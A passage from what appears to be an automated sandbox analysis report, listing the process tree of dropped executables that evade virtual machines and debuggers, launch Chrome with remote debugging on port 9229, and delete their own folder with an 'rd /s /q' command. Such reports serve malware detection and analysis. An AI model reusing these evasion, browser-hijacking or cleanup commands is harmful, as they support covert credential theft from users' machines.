        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1348 --field-trial-handle=1332,i,7328932041499506485,14764092603209718717,131072 /prefetch:2
        9⤵
        
        PID:3896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3800 --field-trial-handle=1332,i,7328932041499506485,14764092603209718717,131072 /prefetch:8
        9⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\cj58q" & exit
        8⤵
        
        PID:4136
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        9⤵
        Delays execution with timeout.exe
        
        PID:4168
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 500
        7⤵
        Loads dropped DLL
        Program crash
        
        PID:3112
      - C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        
        PID:3648
      - C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe"
        6⤵
        Executes dropped EXE
        
        PID:1896
      - C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3292
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6d19758,0x7fef6d19768,0x7fef6d19778
        8⤵
        
        PID:1272
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:3160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1376,i,14639521659852949907,17511965897385602000,131072 /prefetch:2
        8⤵
        
        PID:2536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1376,i,14639521659852949907,17511965897385602000,131072 /prefetch:8
        8⤵
        
        PID:836
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 --field-trial-handle=1376,i,14639521659852949907,17511965897385602000,131072 /prefetch:8
        8⤵
        
        PID:2624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1832 --field-trial-handle=1376,i,14639521659852949907,17511965897385602000,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2712 --field-trial-handle=1376,i,14639521659852949907,17511965897385602000,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2728 --field-trial-handle=1376,i,14639521659852949907,17511965897385602000,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2968
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1480 --field-trial-handle=1376,i,14639521659852949907,17511965897385602000,131072 /prefetch:2
        8⤵
        
        PID:1496
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3832 --field-trial-handle=1376,i,14639521659852949907,17511965897385602000,131072 /prefetch:8
        8⤵
        
        PID:1376
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:3612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        8⤵
        
        PID:3056
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:3592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1168 --field-trial-handle=1300,i,3947948430488896073,13262556715613631810,131072 /prefetch:2
        8⤵
        
        PID:2408
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1300,i,3947948430488896073,13262556715613631810,131072 /prefetch:8
        8⤵
        
        PID:3744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1300,i,3947948430488896073,13262556715613631810,131072 /prefetch:8
        8⤵
        
        PID:2424
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2404 --field-trial-handle=1300,i,3947948430488896073,13262556715613631810,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2460 --field-trial-handle=1300,i,3947948430488896073,13262556715613631810,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3376
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2828 --field-trial-handle=1300,i,3947948430488896073,13262556715613631810,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1372 --field-trial-handle=1300,i,3947948430488896073,13262556715613631810,131072 /prefetch:2
        8⤵
        
        PID:3268
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 --field-trial-handle=1300,i,3947948430488896073,13262556715613631810,131072 /prefetch:8
        8⤵
        
        PID:1716
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:2528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        8⤵
        
        PID:1616
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:3916
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1308,i,18357545219345177667,10570342751634539319,131072 /prefetch:2
        8⤵
        
        PID:3472
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=1308,i,18357545219345177667,10570342751634539319,131072 /prefetch:8
        8⤵
        
        PID:1052
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1548 --field-trial-handle=1308,i,18357545219345177667,10570342751634539319,131072 /prefetch:8
        8⤵
        
        PID:1520
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2376 --field-trial-handle=1308,i,18357545219345177667,10570342751634539319,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2684
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2660 --field-trial-handle=1308,i,18357545219345177667,10570342751634539319,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2668
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2692 --field-trial-handle=1308,i,18357545219345177667,10570342751634539319,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1332 --field-trial-handle=1308,i,18357545219345177667,10570342751634539319,131072 /prefetch:2
        8⤵
        
        PID:4064
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3736 --field-trial-handle=1308,i,18357545219345177667,10570342751634539319,131072 /prefetch:8
        8⤵
        
        PID:3064
      - C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10110290101\rXOl0pp.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2852
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:3560
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef79c9758,0x7fef79c9768,0x7fef79c9778
        8⤵
        
        PID:3744
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:1992
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1280,i,15047398082951686239,11785185975807995676,131072 /prefetch:2
        8⤵
        
        PID:3232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1280,i,15047398082951686239,11785185975807995676,131072 /prefetch:8
        8⤵
        
        PID:2216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1612 --field-trial-handle=1280,i,15047398082951686239,11785185975807995676,131072 /prefetch:8
        8⤵
        
        PID:2768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1280,i,15047398082951686239,11785185975807995676,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2860
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2692 --field-trial-handle=1280,i,15047398082951686239,11785185975807995676,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2796 --field-trial-handle=1280,i,15047398082951686239,11785185975807995676,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1444 --field-trial-handle=1280,i,15047398082951686239,11785185975807995676,131072 /prefetch:2
        8⤵
        
        PID:3888
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3828 --field-trial-handle=1280,i,15047398082951686239,11785185975807995676,131072 /prefetch:8
        8⤵
        
        PID:4016
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:1116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        8⤵
        
        PID:3164
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:3616
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1180 --field-trial-handle=1320,i,5292374448508096158,18269332638494156678,131072 /prefetch:2
        8⤵
        
        PID:3692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1548 --field-trial-handle=1320,i,5292374448508096158,18269332638494156678,131072 /prefetch:8
        8⤵
        
        PID:3876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1648 --field-trial-handle=1320,i,5292374448508096158,18269332638494156678,131072 /prefetch:8
        8⤵
        
        PID:3768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2368 --field-trial-handle=1320,i,5292374448508096158,18269332638494156678,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2168 --field-trial-handle=1320,i,5292374448508096158,18269332638494156678,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1432
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2088 --field-trial-handle=1320,i,5292374448508096158,18269332638494156678,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1004 --field-trial-handle=1320,i,5292374448508096158,18269332638494156678,131072 /prefetch:2
        8⤵
        
        PID:3520
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        
        PID:1932
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7c89758,0x7fef7c89768,0x7fef7c89778
        8⤵
        
        PID:3876
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:3216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1124 --field-trial-handle=1376,i,17642393713077503839,4257769121199074060,131072 /prefetch:2
        8⤵
        
        PID:4012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=976 --field-trial-handle=1376,i,17642393713077503839,4257769121199074060,131072 /prefetch:8
        8⤵
        
        PID:1384
        
